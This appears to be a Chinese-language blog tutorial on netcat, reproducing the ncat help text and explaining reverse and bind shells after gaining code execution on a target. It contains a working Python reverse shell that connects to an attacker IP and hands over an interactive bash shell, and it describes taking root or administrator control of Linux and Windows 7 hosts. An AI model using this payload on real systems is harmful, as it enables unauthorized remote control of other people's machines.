nc使用方法：

Ncat 7.50 ( https://nmap.org/ncat )

Usage: ncat [options] [hostname] [port]

Options taking a time assume seconds. Append ‘ms’ for milliseconds,

‘s’ for seconds, ‘m’ for minutes, or ‘h’ for hours (e.g. 500ms).

  -4                         Use IPv4 only

  -6                         Use IPv6 only

  -U, –unixsock             Use Unix domain sockets only

  -C, –crlf                 Use CRLF for EOL sequence

  -c, –sh-exec <command>    Executes the given command via /bin/sh

  -e, –exec <command>       Executes the given command

      –lua-exec <filename>  Executes the given Lua script

  -g hop1[,hop2,…]         Loose source routing hop points (8 max)

  -G <n>                     Loose source routing hop pointer (4, 8, 12, …)

  -m, –max-conns <n>        Maximum <n> simultaneous connections

  -h, –help                 Display this help screen

  -d, –delay <time>         Wait between read/writes

  -o, –output <filename>    Dump session data to a file

  -x, –hex-dump <filename>  Dump session data as hex to a file

  -i, –idle-timeout <time>  Idle read/write timeout

  -p, –source-port port     Specify source port to use

  -s, –source addr          Specify source address to use (doesn’t affect -l)

  -l, –listen               Bind and listen for incoming connections

  -k, –keep-open            Accept multiple connections in listen mode

  -n, –nodns                Do not resolve hostnames via DNS

  -t, –telnet               Answer Telnet negotiations

  -u, –udp                  Use UDP instead of default TCP

      –sctp                 Use SCTP instead of default TCP

  -v, –verbose              Set verbosity level (can be used several times)

  -w, –wait <time>          Connect timeout

  -z                         Zero-I/O mode, report connection status only

      –append-output        Append rather than clobber specified output files

      –send-only            Only send data, ignoring received; quit on EOF

      –recv-only            Only receive data, never send anything

      –allow                Allow only given hosts to connect to Ncat

      –allowfile            A file of hosts allowed to connect to Ncat

      –deny                 Deny given hosts from connecting to Ncat

      –denyfile             A file of hosts denied from connecting to Ncat

      –broker               Enable Ncat’s connection brokering mode

      –chat                 Start a simple Ncat chat server

      –proxy <addr[:port]>  Specify address of host to proxy through

      –proxy-type <type>    Specify proxy type (“http” or “socks4” or “socks5”)

      –proxy-auth <auth>    Authenticate with HTTP or SOCKS proxy server

      –ssl                  Connect or listen with SSL

      –ssl-cert             Specify SSL certificate file (PEM) for listening

      –ssl-key              Specify SSL private key (PEM) for listening

      –ssl-verify           Verify trust and domain name of certificates

      –ssl-trustfile        PEM file containing trusted SSL certificates

      –ssl-ciphers          Cipherlist containing SSL ciphers to use

      –version              Display Ncat’s version information and exit

See the ncat(1) manpage for full options, descriptions and usage examples

反向连接

在此示例中，目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意，我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行（RCE）漏洞。我们可以在目标主机上使用-e发出Netcat命令，并使用Netcat发出命令启动反向shell。

先启动攻击端的监听：

再在目标端启动反向shell：

 linux

然后可以在攻击端控制目标端的服务器，以root权限；

win7

然后可以在攻击端控制目标端的win7系统，以administrator权限；

python的反向shell：

import os,socket,subprocess;

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((‘192.168.0.21’,8080))

#重定向shell输出

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

#执行子程序

p=subprocess.call([‘/bin/bash’,’-i’])

正向连接

在该图中，目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下：

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。